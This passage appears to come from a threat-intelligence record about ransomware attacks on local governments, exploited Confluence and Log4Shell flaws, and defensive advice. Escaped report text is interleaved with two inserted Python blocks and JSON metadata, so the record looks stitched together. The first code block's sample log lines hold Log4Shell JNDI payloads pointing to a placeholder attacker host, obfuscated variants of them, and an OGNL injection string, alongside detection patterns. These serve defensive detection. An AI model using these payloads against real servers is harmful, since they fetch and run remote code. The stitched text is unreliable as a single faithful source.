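# Line 5 carries a harmless OGNL expression in the shape used by public
# CVE-2022-26134 exploits, not a command.
LOGS = [
    '2022-06-03T10:01:02Z|203.0.113.5|/index.html|Mozilla/5.0',
    '2022-06-03T10:01:09Z|198.51.100.7|/login|${jndi:ldap://198.51.100.7:1389/a}',
    '2022-06-03T10:01:15Z|198.51.100.7|/login|${${lower:j}ndi:${lower:l}dap://198.51.100.7/b}',
    '2022-06-03T10:02:01Z|198.51.100.7|/api?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Argi%3A%2F%2F198.51.100.7%2Fc%7D|curl/7.79',
    '2022-06-04T11:00:00Z|192.0.2.200|/%24%7B%28%23a%3D%40java.lang.System%40getProperty%28%27os.name%27%29%29%7D/|python-requests',
    '2022-06-04T11:00:05Z|192.0.2.200|/rest/api/content|Mozilla/5.0',
]

def reduce_lookup(body):
    '''Resolve one innermost Log4j lookup body to the text it yields, or None
    when it is not one of the obfuscation forms handled here.'''
    if ':-' in body:                         # ${env:NOPE:-j} and ${::-j} give j
        return body.rsplit(':-', 1)[1]
    head, sep, rest = body.partition(':')
    if sep and head.lower() == 'lower':      # ${lower:J} gives j
        return rest.lower()
    if sep and head.lower() == 'upper':      # ${upper:j} gives J
        return rest.upper()
    return None

def normalize_lookups(text, max_rounds=100):
    '''Repeatedly collapse innermost ${...} lookups so obfuscated payloads
    reduce to the plain ${jndi:...} form. Lookups that cannot be resolved
    (jndi itself, or unknown prefixes) are left in place.'''
    for _ in range(max_rounds):
        pos = 0
        changed = False
        while True:
            end = text.find('}', pos)
            if end == -1:
                break
            start = text.rfind('${', 0, end)
            body = text[start + 2:end] if start != -1 else ''
            replacement = reduce_lookup(body) if start != -1 and '}' not in body else None
            if replacement is None:
                pos = end + 1                # try the next closing brace
                continue
            text = text[:start] + replacement + text[end + 1:]
            changed = True
            break
        if not changed:
            break
    return text

def scan_logs(lines):
    '''Return (timestamp, source_ip, indicator) for every suspicious line.'''
    findings = []
    for line in lines:
        ts, src, path, agent = line.split('|', 3)
        # decode twice: double-encoded payloads (%2524...) are common in the wild
        decoded = unquote(unquote(path)) + ' ' + unquote(unquote(agent))
        folded = normalize_lookups(decoded).lower()
        if 'jndi:' in folded:
            findings.append((ts, src, 'log4shell-jndi'))
        elif '${(' in folded or '${#' in folded:
            findings.append((ts, src, 'ognl-expression'))
    return findings

def naive_hits(lines):
    '''Literal substring match for comparison: it sees only the unobfuscated,
    unencoded payload.'''
    return sum(1 for line in lines if 'jndi:' in line.lower())

if __name__ == '__main__':
    for finding in scan_logs(LOGS):
        print(finding)
    print('literal jndi: matches:', naive_hits(LOGS))
```

On the constructed lines the literal match catches one of the three Log4Shell attempts, while decoding and collapsing the nested lookups catches all three; the same normalization step is what makes a WAF or log rule resilient to the ${lower:j} style of evasion. Matching on ${( or ${# flags the OGNL shape regardless of which class or method the expression calls, which is preferable to a signature for any one published proof of concept.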
More recently\r\npublished research may also reflect the exploitation of Confluence vulnerabilities observed by SecurityScorecard.\r\nIn December 2021, analysts first reported that they had observed the Cerber ransomware group exploiting CVE-2021-26084, an OGNL injection\r\nvulnerability that permits attackers to execute arbitrary code on affected versions of Atlassian’s Confluence Server and\r\nData Center products. Then, on June 2, 2022, Atlassian advised Confluence users that a new remote code\r\nexecution vulnerability, CVE-2022-26134 (likewise OGNL injection), was under active exploitation. By June 11, researchers had\r\nobserved at least two ransomware groups (including the aforementioned Cerber) exploiting it. In one particularly\r\nglaring incident, SecurityScorecard observed 64 open CVEs, including both Log4Shell and a GitHub vulnerability,\r\non a client’s system. Even as attackers take up newer vulnerabilities, systems that remain unpatched long after the\r\npublication of a CVE remain low-hanging fruit. In one recent engagement with a municipal\r\nemergency response service, SecurityScorecard determined that a threat actor had originally accessed the target’s\r\nnetwork through its VPN, exploiting a vulnerability in its firewall, which the victim organization had not updated\r\nin over a year. In this particular case, the adversary remained in the victim’s network for months and loaded\r\nransomware onto its systems but ultimately did not deploy it. The decision not to encrypt this organization’s devices, and\r\nparticularly the time it took for the threat actors to reach that decision, may reflect a wider trend. Despite these\r\ngeneral continuities with previously established trends, recent cases have also revealed two novel features of\r\nransomware operations in 2022: increasing dwell time and aggression. 
In the municipal emergency service\r\nincident, SecurityScorecard determined that the attacker spent 90 days in the victim’s systems prior to detection.\r\nAccording to SecurityScorecard experts, this reflects a broader trend: threat actors are taking more time. They\r\noften do not know what data they are stealing during exfiltration, but if they have gone undetected, they\r\nincreasingly appear willing to spend the time to work out what data they can access and what it is worth. In\r\nprevious cases, SecurityScorecard was able to determine that attackers viewed some data but did not exfiltrate it,\r\nlikely because they believed that they could not monetize it, a belief probably shaped by time constraints: they\r\nwere unwilling or unable to spend the time to study victim data and make an informed assessment of its value.\r\nLonger dwell times may therefore indicate that actors hope to make better-informed decisions about what data\r\nthey can monetize. Beyond evaluating the data available to them, the adversaries in the municipal emergency\r\nresponse case disabled the victim’s anti-virus software to avoid detection. They then spent some of their 90-day\r\ndwell time attempting privilege escalation and lateral movement, perhaps in hopes of reaching more lucrative\r\ntargets. From the emergency service, for example, the attackers tried to access the internal systems of other local\r\ngovernment bodies, including city hall, and launched DNS poisoning attacks from the compromised system.\r\nSecurityScorecard has also observed ransomware groups taking increasingly aggressive steps to pressure their\r\nvictims to pay. 
In addition to the secondary and tertiary extortion methods mentioned\r\nabove, attackers have taken more personal steps in recent incidents, contacting friends and family members of\r\nexecutives at some affected organizations to exert additional pressure.\r\n\r\nConclusion: How to Prevent Ransomware Attacks on Local Governments\r\nAlthough some statistics suggest that ransomware operators’ targeting of educational institutions has decreased in\r\n2022, their targeting of local governments may have increased. SecurityScorecard’s findings suggest that a number\r\nof issues affecting organizations in these sectors could render them particularly vulnerable to ransomware. To\r\nreduce that exposure, organizations should make every effort to keep software up to date; unpatched software is\r\neasier to exploit. In addition to the CVEs appearing on previously circulated lists of vulnerabilities frequently\r\nexploited by ransomware, those observed in recent SecurityScorecard engagements may merit particular attention.\r\nOrganizations should also remain on guard against phishing: frequent training would complement the use of SPF,\r\nDKIM, and DMARC, which can reduce the risk of email spoofing. While some credential exposures may be\r\nunavoidable, organizations can reduce the associated risk by advising employees against password reuse, requiring\r\n2FA, and enforcing fairly stringent password length and complexity requirements. SecurityScorecard gathered and\r\nanalyzed this information to provide an overview of its threat intelligence and investigation capabilities as they\r\nrelate to SLED organizations’ exposure to ransomware; the discussion above is not an exhaustive enumeration of\r\nevery possible threat and risk involving ransomware. 
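The SPF and DMARC advice above is easiest to act on with a concrete check. The Python below is an added example, not part of the report or of any SecurityScorecard product. The two record sets are constructed for a hypothetical domain, example-county.gov, and show a weak configuration (a neutral ?all SPF qualifier and a monitoring-only p=none DMARC policy) beside a hardened one (-all, p=reject for the domain and its subdomains, strict alignment, and aggregate reporting). The checker parses the TXT records as DNS would return them and reports every setting that still lets spoofed mail through; the SPF lookup count applies the ten-lookup limit from RFC 7208.

```python
# Constructed TXT records for a hypothetical domain (not from the report):
# the weak starting point beside the hardened version.
WEAK = {
    'example-county.gov': 'v=spf1 include:_spf.example-mail.net ?all',
    '_dmarc.example-county.gov': 'v=DMARC1; p=none; rua=mailto:dmarc@example-county.gov',
}
HARDENED = {
    'example-county.gov': 'v=spf1 ip4:192.0.2.25 include:_spf.example-mail.net -all',
    '_dmarc.example-county.gov': ('v=DMARC1; p=reject; sp=reject; pct=100; '
                                  'rua=mailto:dmarc@example-county.gov; adkim=s; aspf=s'),
}


def parse_spf(record):
    # SPF is a space-separated list of terms that must start with v=spf1.
    terms = record.split()
    if not terms or terms[0].lower() != 'v=spf1':
        return None
    return terms[1:]


def spf_findings(record):
    terms = parse_spf(record)
    if terms is None:
        return ['no SPF record: any host may send as this domain']
    findings = []
    # The last all mechanism decides the fate of unlisted senders; an
    # omitted qualifier means + (pass).
    alls = [t for t in terms if t.lower().lstrip('+-~?') == 'all']
    if not alls:
        findings.append('no all mechanism: unlisted senders are not rejected')
    else:
        qualifier = alls[-1][0] if alls[-1][0] in '+-~?' else '+'
        weak = {
            '+': '+all: every host passes SPF',
            '?': '?all: neutral result, spoofed mail is not rejected',
            '~': '~all: softfail only; pair with DMARC p=reject or use -all',
        }
        if qualifier in weak:
            findings.append(weak[qualifier])
    # RFC 7208 section 4.6.4: each of these costs a DNS lookup, and more
    # than ten in total makes the whole record evaluate to permerror.
    lookup_terms = ('include', 'a', 'mx', 'ptr', 'exists', 'redirect')
    lookups = sum(1 for t in terms
                  if t.lower().lstrip('+-~?').replace('=', ':').split(':')[0] in lookup_terms)
    if lookups > 10:
        findings.append('more than 10 DNS lookups: SPF evaluates to permerror')
    return findings


def parse_dmarc(record):
    # DMARC is a semicolon-separated list of tag=value pairs starting with v=DMARC1.
    tags = {}
    for part in record.split(';'):
        if '=' in part:
            k, v = part.split('=', 1)
            tags[k.strip().lower()] = v.strip()
    return tags if tags.get('v', '').upper() == 'DMARC1' else None


def dmarc_findings(record):
    tags = parse_dmarc(record)
    if tags is None:
        return ['no DMARC record: receivers apply no policy to spoofed mail']
    findings = []
    policy = tags.get('p', '').lower()
    if policy == 'none':
        findings.append('p=none: monitoring only, spoofed mail is still delivered')
    elif policy == 'quarantine':
        findings.append('p=quarantine: spoofed mail lands in spam rather than being rejected')
    elif policy != 'reject':
        findings.append('missing or invalid p tag: record is ignored')
    pct = tags.get('pct', '100')
    if pct.isdigit() and int(pct) < 100:
        findings.append('pct=%d: policy applied to only part of the mail stream' % int(pct))
    if 'rua' not in tags:
        findings.append('no rua: aggregate reports are not collected')
    # sp defaults to p; only worth flagging separately once p is already reject.
    if policy == 'reject' and tags.get('sp', 'reject').lower() != 'reject':
        findings.append('sp weaker than reject: subdomains can still be spoofed')
    return findings


def assess(records, domain):
    # All findings for one domain; an empty list means both records are
    # configured so that receivers reject spoofed mail.
    return (spf_findings(records.get(domain, '')) +
            dmarc_findings(records.get('_dmarc.' + domain, '')))


if __name__ == '__main__':
    for label, recs in (('weak', WEAK), ('hardened', HARDENED)):
        print(label, assess(recs, 'example-county.gov') or ['no findings'])
```

DKIM is not evaluated here because a selector record only proves that signing keys are published; whether mail is actually signed and aligned shows up in the DMARC aggregate reports that the rua tag collects, which is why the checker treats a missing rua as a finding.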
SecurityScorecard can also offer more tailored support for\r\nSLED organizations both before and after ransomware attacks.\r\nHow to Prevent Ransomware Attacks on Local Governments\r\nTo prevent ransomware attacks on local governments, these institutions must have up-to-date cybersecurity\r\nprocedures that everyone follows. Here are some of the best ways to address and prevent these types of attacks:\r\nIncident Response Support\r\nIn the event of a confirmed or suspected ransomware attack, SecurityScorecard can provide managed incident\r\nresponse and digital forensics teams as a professional service to customers, staffed by former law enforcement and\r\nprivate-sector experts with decades of experience in the space. For immediate support from our teams, please\r\ncontact Ranell Gonzales.\r\nCyber Risk Intelligence as a Service\r\nSecurityScorecard’s threat research and intelligence could be the competitive advantage SLED organizations need\r\nto stay ahead of today’s fast-moving threat actors. For regular custom insights drawing on our team’s 100+ years of\r\ncombined threat research and investigation experience, or for more details on these findings and the other\r\nkeywords that were provided, please contact Ranell Gonzales for a discussion of our Cyber Risk Intelligence as a\r\nService (CRIaaS) offering. While this report should be considered trustworthy but preliminary, our team can\r\ncontinue diving into these details and offer further support by working with on-site staff at local government and\r\neducational institutions. 
We can, for example, conduct additional analysis on the malware, targets, data transfer\r\ndestinations, and specific context around the leaked credentials at a given organization.\r\nAttack Surface Intelligence\r\nSecurityScorecard’s new Attack Surface Intelligence (ASI) solution gives you direct access to SecurityScorecard’s\r\ndeep threat intelligence data through a global tab on the ratings platform. ASI analyzes billions of sources to\r\nprovide deep threat intelligence and visibility into any IP address, network, domain, or vendor’s attack surface\r\nrisk, from a single pane of glass. This helps customers do more with the petabytes of data that form the basis of\r\nSecurityScorecard Ratings, including identifying all of an organization’s connected assets, exposing unknown\r\nthreats, conducting investigations at scale, and prioritizing vendor remediation with actionable intelligence. ASI is\r\nbuilt into SecurityScorecard’s ratings platform through an enhanced Portfolio view or global search across all\r\nInternet assets, leaked credentials, and infections and metadata from the largest malware sinkhole in the world.\r\nAccess ASI today through our Early Access program by filling out the demo request form or contacting Assel\r\nDmitriyeva.\r\nBlueprint for Ransomware Defense\r\nOn August 4, the Institute for Security and Technology’s (IST) Ransomware Task Force (RTF) announced the\r\nrelease of its Blueprint for Ransomware Defense, a clear, actionable framework for ransomware mitigation,\r\nresponse, and recovery aimed at helping organizations navigate the growing frequency of attacks.\r\nSecurityScorecard is proud to be the only security ratings platform to sponsor and participate in the development\r\nof the Blueprint and is one of only five organizations that participated in the program’s development. 
You can see\r\nthe Blueprint for Ransomware Defense here.\r\nSource: https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments"
	],
	"report_names": [
		"the-increase-in-ransomware-attacks-on-local-governments"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434534,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3fc64f07e8dcc714888ed5bef6a950dfdc981c1e.pdf",
		"text": "https://archive.orkl.eu/3fc64f07e8dcc714888ed5bef6a950dfdc981c1e.txt",
		"img": "https://archive.orkl.eu/3fc64f07e8dcc714888ed5bef6a950dfdc981c1e.jpg"
	}
}